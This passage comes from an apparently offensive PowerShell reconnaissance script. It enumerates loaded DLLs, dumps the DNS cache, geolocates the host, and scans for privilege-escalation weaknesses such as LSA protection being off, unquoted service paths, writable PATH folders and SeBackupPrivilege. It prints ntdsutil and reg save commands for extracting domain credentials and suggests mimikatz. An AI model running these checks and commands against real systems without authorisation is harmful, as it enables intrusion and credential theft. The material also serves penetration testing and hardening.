Name : UserOOBEBroker
Id : 22804
StartTime : 13/10/2025 17:17:45
Description : User OOBE Broker
Path : C:\Windows\System32\oobe\UserOOBEBroker.exe
Modules : {ntdll.dll, KERNEL32.DLL, KERNELBASE.dll, ADVAPI32.dll...}
#>
Clear-Host
$CmdLetAppl = "DLLs search"
write-host $StartBanner -ForegroundColor DarkRed
write-host "Search for DLLs loaded by running processes" -ForegroundColor Green
write-host "`n`nModule Description"
write-host "------ -----------" -ForegroundColor Blue
write-host "Get-All Print all running processes"
write-host "Get-Dll Print all processes that load DLLs"
write-host "Get-Pro Search loaded DLLs by process name"
write-host "Get-Pid Search loaded DLLs by process PID`n`n"
write-host "[ScanDLL]" -NoNewline
write-host ": " -ForegroundColor Blue -NoNewline
$Choise = Read-Host
If($Choise -iMatch "Get-All")
{
# Print ALL running processes info
$LoadedDLLs = ((Get-Process -Name "*"|Select-Object *|Where-Object {
$_.Responding -Match "True" -and $_.Modules -ne ""}|
Select-Object Name,Id,Responding,ProductVersion,StartTime,Path,@{Name='Modules';Expression={(Get-Process -Id $_.Id).Modules.ModuleName|
Where-Object{$_ -iNotMatch ".exe"}}}|Format-List))
If($LoadedDLLs)
{
Write-Host "Action : " -ForegroundColor Blue -NoNewline
Write-Host "Print all running processes"
Start-Sleep -Milliseconds 1500
echo $LoadedDLLs|Out-String -Stream|ForEach-Object {
$stringformat = If($_ -Match "^(----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
ElseIf($_ -iMatch "^(Id)")
{
@{ 'ForegroundColor' = 'Yellow' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
}
Else
{
Write-Host "`n[" -NoNewline
Write-Host "`x" -ForegroundColor Red -NoNewline
Write-Host "`] ERROR: " -NoNewline
Write-Host " None DLLs loaded by $APPLtOsEARCH found.`n" -ForegroundColor Red
return
}
}
ElseIf($Choise -iMatch "Get-Dll")
{
# Print ALL running processes that loaded DLLs
$LoadedDLLs = ((Get-Process -Name "*"|Select-Object *|Where-Object {
$_.Responding -Match "True" -and $_.Modules.ModuleName -iMatch "(.dll)$"}|
Select-Object Name,Id,StartTime,Description,Path,@{Name='Modules';Expression={(Get-Process -Id $_.Id).Modules.ModuleName|
Where-Object{$_ -iNotMatch ".exe"}}}|Format-List))
If($LoadedDLLs)
{
Write-Host "Action : " -ForegroundColor Blue -NoNewline
Write-Host "Print all processes that loaded DLLs"
Start-Sleep -Milliseconds 1500
echo $LoadedDLLs|Out-String -Stream|ForEach-Object {
$stringformat = If($_ -Match "^(----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
ElseIf($_ -iMatch "^(Id)")
{
@{ 'ForegroundColor' = 'Yellow' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
}
Else
{
Write-Host "`n[" -NoNewline
Write-Host "`x" -ForegroundColor Red -NoNewline
Write-Host "`] ERROR: " -NoNewline
Write-Host " None DLLs loaded by $APPLtOsEARCH found.`n" -ForegroundColor Red
return
}
}
ElseIf($Choise -iMatch "Get-pro")
{
# Search loaded DLLs by process name
write-host "Input ProcessName: " -ForegroundColor Blue -NoNewline
$APPLtOsEARCH = Read-Host
If([string]::IsNullOrEmpty($APPLtOsEARCH))
{
$APPLtOsEARCH = "svchost"
}
$LoadedDLLs = ((Get-Process -Name "$APPLtOsEARCH"|Select-Object *|Where-Object {
$_.Responding -Match "True" -and $_.Modules.ModuleName -iMatch "(.dll)$"}|
Select-Object Name,Id,StartTime,Description,Path,@{Name='Modules';Expression={(Get-Process -Id $_.Id).Modules.ModuleName|
Where-Object{$_ -iNotMatch ".exe"}}}|Format-List))
If($LoadedDLLs)
{
Write-Host "ProcessName : " -ForegroundColor Blue -NoNewline
Write-Host "$APPLtOsEARCH " -NoNewline
Write-Host "[found]" -ForegroundColor Green
Write-Host "Action : " -ForegroundColor Blue -NoNewline
Write-Host "Print all processes that loaded DLLs"
Start-Sleep -Seconds 2
echo $LoadedDLLs|Out-String -Stream|ForEach-Object {
$stringformat = If($_ -Match "^(----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
ElseIf($_ -iMatch "^(Id)")
{
@{ 'ForegroundColor' = 'Yellow' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
}
Else
{
Write-Host "`n[" -NoNewline
Write-Host "`x" -ForegroundColor Red -NoNewline
Write-Host "`] ERROR: " -NoNewline
Write-Host "None DLLs loaded by $APPLtOsEARCH found.`n" -ForegroundColor Red
return
}
}
ElseIf($Choise -iMatch "Get-pid")
{
# Search loaded DLLs by process PID
write-host "Input Process PID: " -ForegroundColor Blue -NoNewline
$DLLPID = Read-Host
$PidLoa = (Get-Process -Id $DLLPID).ProcessName
If([string]::IsNullOrEmpty($PidLoa))
{
write-host "`n[" -NoNewline
write-host "x" -ForegroundColor Red -NoNewline
write-host "] ERROR: " -NoNewline
write-host "None Process with PID $DLLPID found running`n" -ForegroundColor Red
return
}
$LoadedDLLs = ((Get-Process -Name "*"|Select-Object *|Where-Object {
$_.Id -Match "$DLLPID" -and $_.Responding -Match "True" -and $_.Modules.ModuleName -iMatch "(.dll)$"})).Modules|
Select-Object Size,ModuleName,FileName
If($LoadedDLLs)
{
Write-Host "ProcessName : " -ForegroundColor Blue -NoNewline
Write-Host "$PidLoa " -NoNewline
Write-Host "[found]" -ForegroundColor Green
Write-Host "Action : " -ForegroundColor Blue -NoNewline
Write-Host "Print all DLLs loaded and paths"
Start-Sleep -Seconds 2
echo $LoadedDLLs|Format-Table -AutoSize|Out-String -Stream|ForEach-Object {
$stringformat = If($_ -Match "(----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
ElseIf($_ -Match "($PidLoa.exe)")
{
@{ 'ForegroundColor' = 'Green' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
}
Else
{
Write-Host "`n[" -NoNewline
Write-Host "`x" -ForegroundColor Red -NoNewline
Write-Host "`] ERROR: " -NoNewline
Write-Host "None DLLs loaded by Id: $DLLPID found`n" -ForegroundColor Red
return
}
}
Else
{
write-host "`n[" -NoNewline
write-host "x" -ForegroundColor Red -NoNewline
write-host "] ERROR: " -NoNewline
write-host "Wrong ScanDLL choise input.`n" -ForegroundColor Red
return
}
# Invoke BallonTip
Invoke-BallonTip
return
}
If($Dns.IsPresent)
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Get device DNS Resolver cache
.OUTPUTS
[+] Display SKYNET DNS Resolver Cache
[*] OS:Microsoft Windows NT 10.0.26100.0
[*] Mac Address: B8-1E-A4-EE-91-C3
[*] Interface: WiFi
RecordName IP4Address IP6Address
---------- ---------- ----------
a124.dscd.akamai.net 95.95.253.137
a1666.dscr.akamai.net 2.23.103.97
a1856.dspw65.akamai.net 95.95.253.201
eu2-autoupdate.opera.com 82.145.216.46
eu2-autoupdate.opera.com 2001:4c28:1:430:82:145:216:20
paRT-0014.t-0009.FB-t-mseDge.net 2620:1ec:48:1::42
www.google.CoM 216.58.209.68
www.gstatic.com 142.250.200.67
www.tm.v4.a.prd.aadg.akadns.net 20.190.181.23
[?] Flush DNS Resolver Cache? (yes|no):
#>
Clear-Host
$CmdLetAppl = "Dns Resolver"
write-host $StartBanner -ForegroundColor DarkRed
$OsStrings = ([System.Environment]::OSVersion).VersionString
$InterFace = (Get-NetIPAddress|Where-Object PrefixOrigin -eq dhcp).InterFaceAlias
$MacAddres = (Get-NetAdapter|Where-Object {$_.Name -Match "^($InterFace)$"}).MacAddress
Write-Host "`n[" -NoNewline
Write-Host "+" -ForegroundColor Blue -NoNewline
Write-Host "] " -NoNewline
Write-Host "Display $Env:COMPUTERNAME DNS Resolver Cache" -ForegroundColor Blue
Write-Host "[" -NoNewline
Write-Host "*" -ForegroundColor Green -NoNewline
Write-Host "] OS:$OsStrings"
Write-Host "[" -NoNewline
Write-Host "*" -ForegroundColor Green -NoNewline
Write-Host "] Mac Address: $MacAddres"
Write-Host "[" -NoNewline
Write-Host "*" -ForegroundColor Green -NoNewline
Write-Host "] Interface: $InterFace"
Start-Sleep -Seconds 2
echo ""
## Remove duplicated lines: |Sort-Object -unique
# Get-DnsClientCache|Select-Object *|findstr /V "TTL CimInstanceProperties PSComputerName InstanceID Description Section Status Type Caption ElementName CimSystemProperties CimClass"|Format-List
$ReportDns = (ipconfig /displaydns|Select-String -Pattern "Record Name") -replace '^\s+',' '|Sort-Object -unique
# DNS RESOLVER CACHE - TABLE
$WhoIstable = New-Object System.Data.DataTable
$WhoIstable.Columns.Add("RecordName")|Out-Null
$WhoIstable.Columns.Add("IP4Address")|Out-Null
$WhoIstable.Columns.Add("IP6Address")|Out-Null
ForEach($WhoisLookup in $ReportDns)
{
# Parsing data from $ReportDns
$Sanitize = $WhoisLookup -replace ' Record Name . . . . . : ',''
# Resolve hostname to Ip4Adress and Ip6Adress
$LookUP_ = (Resolve-DNSName "$Sanitize"|Select-Object Name,IP4Address,IP6Address|Sort-Object -unique|Format-List)
If(-not([string]::IsNullOrEmpty($LookUP_)))
{
$_IP6Add = ($LookUP_|findstr /C:"IP6Address") -replace 'IP6Address : ',''
$_IP4Ad_ = ($LookUP_|findstr /C:"IP4Address") -replace 'IP4Address : ',''
$_Names_ = ($LookUP_|findstr /C:"Name") -replace 'Name : ',''
## Adding values to output DataTable!
$WhoIstable.Rows.Add("$_Names_", ## name
"$_IP4Ad_", ## IP4Address
"$_IP6Add" ## IP6Address
)|Out-Null
}
}
## Display DNS resolver cache OnScreen
echo $WhoIstable|Format-Table -AutoSize
# Append to logfile ?
If($Logfile.IsPresent)
{
Write-Host "[" -NoNewline
Write-Host ">" -ForegroundColor Green -NoNewline
Write-Host "] logfile:" -NoNewline
Write-Host "'$pwd\$LogName'" -ForegroundColor Green
echo $ReportDns >> $LogName
}
# flush dns resolver cache ?
write-host "[" -NoNewline
write-host "?" -ForegroundColor Yellow -NoNewline
$Question = Read-Host "] Flush DNS Resolver Cache? (yes|no)"
If($Question -iMatch '^(y|yes)$')
{
ipconfig /flushdns
}
# Invoke ballontip
Invoke-BallonTip
return
}
If($GeoLocation.IsPresent)
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Retrieve device geo-location
.NOTES
This function uses ipapi.co API that has
a limmit of querys we can perform by day.
.OUTPUTS
External IP city country latitude longitude Organization
----------- ---- ------- -------- --------- ------------
253.93.174.123 Lisbon Portugal 38.7219 -9.1398 Nos Comunicacoes, S.A.
[+] GoogleMaps: https://www.google.com/maps/dir/@38.7219,-9.1398
#>
Clear-Host
$CmdLetAppl = "GeoLocation"
write-host $StartBanner -ForegroundColor DarkRed
# Build GeoLocation DataTable!
$geotable = New-Object System.Data.DataTable
$geotable.Columns.Add("External IP")|Out-Null
$geotable.Columns.Add("city")|Out-Null
$geotable.Columns.Add("country")|Out-Null
$geotable.Columns.Add("latitude")|Out-Null
$geotable.Columns.Add("longitude")|Out-Null
$geotable.Columns.Add("Organization")|Out-Null
# Gets Ipv4 Or Ipv6 external ip adrress
$PublicAddr = (Invoke-WebRequest -Uri "http://ifconfig.me/ip").Content
If(($PublicAddr -Match '^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})$') -Or ($PublicAddr -Match '^([A-Za-z0-9+/]{1,4}:[A-Za-z0-9+/]{1,3}:[A-Za-z0-9+/]{1,4}:)'))
{
# Get GeoLocation using https://ipapi.co
$GeoLocation = (Invoke-WebRequest -Uri "https://ipapi.co/$PublicAddr/json/").RawContent|
findstr /C:"city" /C:"region" /C:"country_" /C:"latitude" /C:"longitude" /C:"org"|
findstr /V "iso3 tld calling area population region_code country_code"
# 429 HTTPS statuscode = ipapi.co quota reached
If($GeoLocation -Match '^(True)$')
{
<#
.NOTES
http://ipinfo.io does not have quota limmit
but its less accurate that http://ipapi.co
.OUTPUTS
External IP city country latitude longitude org
----------- ---- ------- -------- --------- ---
213.22.159.133 Porto PT 41.1496 -8.6110 AS2860 NOS COMUNICACOES, S.A.
[+] Uri: https://www.google.com/maps/dir/@41.1496,-8.6110
#>
Write-Host "`n[" -NoNewline
Write-Host "`x" -ForegroundColor Red -NoNewline
Write-Host "] https://ipapi.co: " -NoNewline
Write-Host "number of requests by day reached." -ForegroundColor Red
Start-Sleep -Seconds 2
Write-Host "[" -NoNewline
Write-Host "+" -ForegroundColor Blue -NoNewline
Write-Host "] Resolving with http://ipinfo.io [less accurate]`n"
Start-Sleep -Seconds 1
# Split() coordinate values into two strings to build table later
$GeoDateLoc = (Invoke-WebRequest -Uri "http://ipinfo.io" -UseBasicParsing).Content|findstr /C:"loc"
$Coordinates = $GeoDateLoc -replace '"','' -replace 'loc:','' -replace '(,)$','' -replace '(^\s+|\s+$)',''
$latitude = ($Coordinates -split(',')|Select-Object -First 1)
$longitude = ($Coordinates -split(',')|Select-Object -Last 1)
# Make sure the @latitude value its not empty
If(([string]::IsNullOrEmpty($latitude)) -Or ($latitude -Match "^(True)$"))
{
Write-Host "[" -NoNewline
Write-Host "`x" -ForegroundColor Red -NoNewline
Write-Host "] http://ipinfo.io: " -NoNewline
Write-Host "unable to resolve geo-location.`n" -ForegroundColor Red
return
}
# Get GeoLocation using http://ipinfo.io
Invoke-RestMethod -Uri ('http://ipinfo.io/'+(Invoke-WebRequest -uri "http://ifconfig.me/ip" -UseBasicParsing).Content)|
Select-Object @{Name='External IP';Expression={"$PublicAddr"}},city,country,@{Name='latitude';Expression={"$latitude"}},@{Name='longitude';Expression={"$longitude"}},org|Format-Table -AutoSize
# GoogleMaps API
write-host "[" -NoNewline
write-host "+" -ForegroundColor Blue -NoNewline
write-host "] GoogleMaps: " -NoNewline
write-host "https://www.google.com/maps/dir/@$Coordinates`n" -ForegroundColor Green
# BaloonTip
Invoke-BallonTip
return
}
}
Else
{
Write-Host "`n[" -NoNewline
Write-Host "`x" -ForegroundColor Red -NoNewline
Write-Host "] http://ifconfig.me: " -NoNewline
Write-Host "Unhable to retrieve public ip addr.`n" -ForegroundColor Red
return
}
# Parsing raw data
$GeoDate = $GeoLocation -replace '"','' -replace ',','' -replace '(^\s+|\s+$)',''
$Moreati = $Geodate -replace '(city: |region: |country_name: |country_capital: |latitude: |longitude: |org: )',''
$city = $Moreati[0] ## city
$cnam = $Moreati[2] ## country_name
$lati = $Moreati[4] ## latitude
$long = $Moreati[5] ## longitude
$Orgs = $Moreati[6] ## organization
# Adding values to DataTable!
$geotable.Rows.Add("$PublicAddr", ## PublicIP
"$city", ## city
"$cnam", ## country_name
"$lati", ## latitude
"$long", ## longitude
"$Orgs" ## organization
)|Out-Null
# Display Data Table OnScreen
$geotable|Format-Table -AutoSize
# GoogleMaps API
write-host "[" -NoNewline
write-host "+" -ForegroundColor Blue -NoNewline
write-host "] GoogleMaps: " -NoNewline
write-host "https://www.google.com/maps/dir/@$lati,$long`n" -ForegroundColor Green
## BaloonTip
Invoke-BallonTip
return
}
If($Mitre.IsPresent)
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Search for possible MITRE vulnerabilitys
.OUTPUTS
VulnId : TermService [Mitre T1021]
Service : Stopped
DLLstatus : Unknown
VulnStatus : NON VULNERABLE
VulnId : Unquoted Service Path [Mitre T1574]
FolderPath : C:\Program Files\Google\Play Games Services\25.8.551.0\Service\GooglePlayGamesServices.exe
StartName : LocalSystem
StartMode : Auto
VulnStatus : VULNERABLE
VulnId : Juicy potato golden privileges [Mitre TA0004]
*NOTES : Requires 2 Enabled privileges and BITS service
CLSID identifier to be vulnerable to escalation
-----------------------------------------------
PrivilegeName : SeAssignPrimaryTokenPrivilege
BITS CLSID : {69AD4AEE-51BE-439b-A92C-86AE490E8B30}
State : Enabled
Return : VULNERABLE
PrivilegeName : SeImpersonatePrivilege
BITS CLSID : {69AD4AEE-51BE-439b-A92C-86AE490E8B30}
State : Disabled
Return : NON VULNERABLE
-----------------------------------------------
VulnStatus : NON VULNERABLE
VulnId : Weak Directory permissions [Mitre T1222]
FolderPath : C:\Program Files (x86)\StarCraft II\Versions\Base94137
FileSystemRights : FullControl
IdentityReference : BUILTIN\\Users
IsInherited : True
VulnStatus : VULNERABLE
#>
Clear-Host
$CmdLetAppl = "Mitre ATT&CK"
write-host $StartBanner -ForegroundColor DarkRed
Write-Host "`n`n -|[ MITRE ATT&CK VULNERABILITY SCANNER ]|-`n" -ForegroundColor Green
Start-Sleep -Seconds 2
$PS2Version = ""
## [CHECK FOR POWERSHELL VERSION 2]
Write-Host "VulnId : Powershell v2 Engine [amsi bypass]"
Start-Sleep -Milliseconds 1000
$RegistryPaths = @(
"Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine",
"Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\2\PowerShellEngine",
"Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine"
)
ForEach($TokenID in $RegistryPaths)
{
$PS2Version = (Get-ItemProperty -Path "$TokenID" -Name PowerShellVersion).PowerShellVersion
If($PS2Version -Match "2.0")
{
$Location = $TokenID -replace "Registry::",""
break
}
}
If($PS2Version -Match "2.0")
{
Write-Host "Powershell V2 : $PS2Version"
Write-Host "RegPath : $Location"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
Else
{
Write-Host "Powershell V2 : Not Found"
Write-Host "RegPath : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
## [Check UAC settings]
Write-Host "`nVulnId : UAC settings [Mitre T1052]"
Start-Sleep -Milliseconds 1000
$POSD = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System').PromptOnSecureDesktop
$CPBA = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System').ConsentPromptBehaviorAdmin
If($CPBA -eq 0 -and $POSD -eq 0){$Report = "Never notIfy"}
If($CPBA -eq 2 -and $POSD -eq 1){$Report = "Allways notIfy"}
If($CPBA -eq 5 -and $POSD -eq 1){$Report = "NotIfy me only when apps try to make changes"}
If($CPBA -eq 5 -and $POSD -eq 0){$Report = "NotIfy me only when apps try to make changes (do not dim my desktop)"}
If([string]::IsNullOrEmpty($CPBA)){$Report = "Unknow"}
If([string]::IsNullOrEmpty($POSD)){$Report = "Unknow"}
If((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System').EnableLUA -eq 1)
{
Write-Host "EnableLUA : 1 [enabled]"
Write-Host "Status : $Report"
Write-Host "VulnStatus : " -NoNewline
If($Report -iMatch "^(Never notIfy)$")
{
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 700
}
Else
{
Write-Host "NON VULNERABLE" -ForegroundColor Red
Start-Sleep -Milliseconds 400
}
}
Else
{
Write-Host "EnableLUA : 0 [disabled]"
Write-Host "Status : Never notIfy"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 400
}
## [LSA Protection - UEFI]
Start-Sleep -Milliseconds 1000
Write-Host "`nVulnId : LSA Protection [Mitre TA0005]"
$RunAsPPL = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\LSA').RunAsPPL
$AsPPLBot = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\LSA').RunAsPPLBoot
If(-not([string]::IsNullOrEmpty($RunAsPPL)))
{
If($RunAsPPL -eq 0)
{
Write-Host "LSA protection : $RunAsPPL [disabled]"
Write-Host "RunAsPPLBoot : $AsPPLBot [UEFI]"
Write-Host "Status : LSA Protection Disabled. Try mimikatz"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 400
}
ElseIf($RunAsPPL -eq 1)
{
Write-Host "LSA protection : $RunAsPPL [enabled]"
Write-Host "RunAsPPLBoot : $AsPPLBot [UEFI]"
Write-Host "Status : LSA Enabled with UEFI Lock"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
Start-Sleep -Milliseconds 400
}
ElseIf($RunAsPPL -eq 2)
{
Write-Host "LSA protection : $RunAsPPL [enabled]"
Write-Host "RunAsPPLBoot : $AsPPLBot [UEFI]"
Write-Host "Status : LSA Enabled without UEFI Lock"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
Start-Sleep -Milliseconds 400
}
}
Else
{
Write-Host "LSA protection : Unknown"
Write-Host "RunAsPPLBoot : $AsPPLBot [UEFI]"
Write-Host "Status : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
Start-Sleep -Milliseconds 400
}
[int]$Count='0'
## [OpenSSH Keys]
Start-Sleep -Milliseconds 1300
If(Test-Path -Path "HKCU:\Software\OpenSSH\Agent\Keys")
{
$KeysDB = $(reg query 'HKCU\Software\OpenSSH\Agent\Keys')|Where-Object {$_ -ne ""}
ForEach($Key in $KeysDB)
{
$splitKey = ($Key -split("\\")|Select-Object -Last 1)
Write-Host "`nVulnId : OpenSSH Keys [Mitre T1098]"
Write-Host "Location : HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys"
Write-Host "OpenSSH Key : $splitKey"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 400
$Count++
}
}
If($Count -eq 0)
{
Write-Host "`nVulnId : OpenSSH Keys [Mitre T1098]"
Write-Host "Location : Unknown"
Write-Host "OpenSSH Key : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
Start-Sleep -Milliseconds 400
}
[int]$Counter='0'
Start-Sleep -Milliseconds 1300
## [STARTUP PROGRAMS SEARCH] - search 15 entrys max
$Names = (Get-CimInstance Win32_StartupCommand).Name
$Location = (Get-CimInstance Win32_StartupCommand).Location
$NumbersDB = @("0","1","2","3","4","5","6","7","8","9","10","11","12","13","14")
$replit = $Location -split(" ")
$splits = $Names -split(" ")
ForEach($dbNumber in $NumbersDB)
{
If(-not([string]::IsNullOrEmpty($splits[$dbNumber])))
{
Write-Host "`nVulnId : StartUp Entrys [Mitre T1547]"
Write-Host "Location :" $replit[$dbNumber]
Write-Host "name :" $splits[$dbNumber]
Write-Host "VulnStatus : " -NoNewline
Write-Host "WARNING" -ForegroundColor Yellow
Start-Sleep -Milliseconds 400
$Counter++
}
}
If($Counter -eq 0)
{
Write-Host "`nVulnId : StartUp Entrys [Mitre T1547]"
Write-Host "Location : Unknown"
Write-Host "name : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
$Service = "Stopped"
Start-Sleep -Milliseconds 1300
## [TERMSERVICE VULNERABILITY SEARCH]
Write-Host "`nVulnId : TermService [Mitre T1021]"
If((Get-Service -Name "termservice" -EA SilentlyContinue).Status -ieq "Running")
{
$Service = "Running"
$PPID = (PS -EA SilentlyContinue|Where-Object{
$_.ProcessName -iMatch 'svchost' -and $_.Responding -iMatch 'True' -and $_.Modules.ModuleName -iMatch "rdpcorets.dll"}).Id
If($PPID)
{
$DLLstatus = "rdpcorets.dll loaded by svchost [PID $PPID]"
$Report = "VULNERABLE"
}
Else
{
$DLLstatus = "rdpcorets.dll not loaded by svchost service"
$Report = "NON VULNERABLE"
}
}
Else
{
# service stopped
$DLLstatus = "Unknown"
$Report = "NON VULNERABLE"
}
Write-Host "Service : $Service"
Write-Host "DLLstatus : $DLLstatus"
Write-Host "VulnStatus : " -NoNewline
If($Report -iMatch "^(VULNERABLE)$")
{
Write-Host "$Report" -ForegroundColor Green
}
Else
{
Write-Host "$Report" -ForegroundColor Red
}
[int]$Counter='0'
Start-Sleep -Milliseconds 1300
## [SEARCH FOR UNQUOTED SERVICE PATHS]
$UnquotedTable = (gwmi -class Win32_Service -Property Name,DisplayName,PathName,StartMode,StartName|Where-Object {
$_.StartMode -eq "Auto" -and $_.StartName -eq 'LocalSystem' -and $_.PathName -NotLike "C:\Windows*" -and $_.PathName -NotMatch '"*"'
}).PathName
If($UnquotedTable)
{
ForEach($TokenPath in $UnquotedTable)
{
Write-Host "`nVulnId : Unquoted Service Path [Mitre T1574]"
Write-Host "ServicePath : $TokenPath"
Write-Host "StartName : LocalSystem"
Write-Host "StartMode : Auto"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 400
$Counter++
}
}
If($Counter -eq 0)
{
Write-Host "`nVulnId : Unquoted Service Path [Mitre T1574]"
Write-Host "ServicePath : Not Found"
Write-Host "StartName : Unknown"
Write-Host "StartMode : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
$EnvPaths=''
$VulnPaths=''
[int]$Count='0'
## [Env:PATH DLL hijacking]
# Author: @HarmJ0y [PowerUp]
Start-Sleep -Milliseconds 600
$EnvPaths = (Get-Item Env:Path).value.split(';')|Where-Object {$_ -ne ""}
ForEach($VulnPaths in $EnvPaths)
{
$VulnPaths = $VulnPaths.Replace('"',"")
If(-not($VulnPaths.EndsWith("\")))
{
$VulnPaths = $VulnPaths + "\"
}
# reference - http://stackoverflow.com/questions/9735449/how-to-verify-whether-the-share-has-write-access
$TestPath = Join-Path -Path $VulnPaths ([IO.Path]::GetRandomFileName())
# if the path doesn't exist, try to create the folder before testing it for write
If(-not($(Test-Path -Path "$VulnPaths")))
{
try {
# try to create the folder
$Null = New-Item -ItemType directory -Path $VulnPaths
echo $Null > $TestPath
Write-Host "`nVulnId : Env:PATH DLL hijacking [Mitre T1574]"
Write-Host "Env:PATH : $VulnPaths"
If($VulnPaths.EndsWith("\"))
{
Write-Host "Exploitation : ${VulnPaths}" -NoNewline
Write-Host "Malicious.dll" -ForegroundColor Yellow
}
Else
{
Write-Host "Exploitation : ${VulnPaths}\" -NoNewline
Write-Host "Malicious.dll" -ForegroundColor Yellow
}
Write-Host "FolderAccess : Read,Write"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 700
$Count++
}
catch {}
finally
{
# remove the directory
Remove-Item -Path "$VulnPaths" -Recurse -Force -EA SilentlyContinue
}
}
Else
{
# if the folder already exists
try {
echo $Null > $TestPath
Write-Host "`nVulnId : Env:PATH DLL hijacking [Mitre T1574]"
Write-Host "Env:PATH : $VulnPaths"
If($VulnPaths.EndsWith("\"))
{
Write-Host "Exploitation : ${VulnPaths}" -NoNewline
Write-Host "Malicious.dll" -ForegroundColor Yellow
}
Else
{
Write-Host "Exploitation : ${VulnPaths}\" -NoNewline
Write-Host "Malicious.dll" -ForegroundColor Yellow
}
Write-Host "FolderAccess : Read, Write"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 700
$Count++
}
catch {}
finally
{
# Try to remove the item again just to be safe
Remove-Item -Path "$TestPath" -Force -EA SilentlyContinue
}
}
}
If($Count -eq 0)
{
Write-Host "`nVulnId : Env:PATH DLL hijacking [Mitre T1574]"
Write-Host "Env:PATH : Unknown"
Write-Host "Exploitation : Unknown"
Write-Host "FolderAccess : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
$NtdsPath = "Unknown"
## [ntds.dit - SeBackupPrivilege ]
# SeChangeNotifyPrivilege <-- to test proposes (active)
# resource: https://www.semperis.com/blog/ntds-dit-extraction-explained
Write-Host "`nVulnId : Ntds::SeBackupPrivilege [Mitre T1003]"
Start-Sleep -Milliseconds 1000
# requires admin
If($IsClientAdmin)
{
If([System.IO.File]::Exists("$Env:WINDIR\NTDS\Ntds.dit"))
{
$NtdsPath = "$Env:WINDIR\NTDS\Ntds.dit"
}
$Ntds = whoami /priv|findstr /i /C:'SeBackupPrivilege'|findstr /i /C:'Enabled'
$privileges0 = $Ntds.split()[0] # SeBackupPrivilege
If($privileges0 -Match "^(SeBackupPrivilege)$")
{
Write-Host "PrivilegeName : $privileges0"
Write-Host "State : Enabled"
Write-Host "Ntds.dit : $NtdsPath"
If($NtdsPath -Match "$Env:WINDIR\NTDS\Ntds.dit")
{
Write-Host "Exploit : Ntdsutil `"activate instance ntds`" `"ifm`" `"create full $Env:TEMP`" quit quit"
Write-Host "Exploit : Reg save HKLM\SYSTEM `"$Env:TEMP\system.save`""
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
Else
{
Write-Host "Exploit : Unknow"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
}
Else
{
Write-Host "PrivilegeName : SeBackupPrivilege"
Write-Host "State : Unknown"
Write-Host "Ntds.dit : $NtdsPath"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
}
Else
{
# Running under user privileges
Write-Host " -----------------------------------------------"
Write-Host " Error: Can only be tested with admin privileges" -ForegroundColor Red
Write-Host " -----------------------------------------------"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
## [ROTTEN POTATO SEARCH]
# SeChangeNotifyPrivilege <-- to test proposes (active)
Write-Host "`nVulnId : Rotten potato escalation [Mitre TA0004]"
Start-Sleep -Milliseconds 1000
## Make sure we are NOT running
# tests under Admin privileges
If(-not($IsClientAdmin))
{
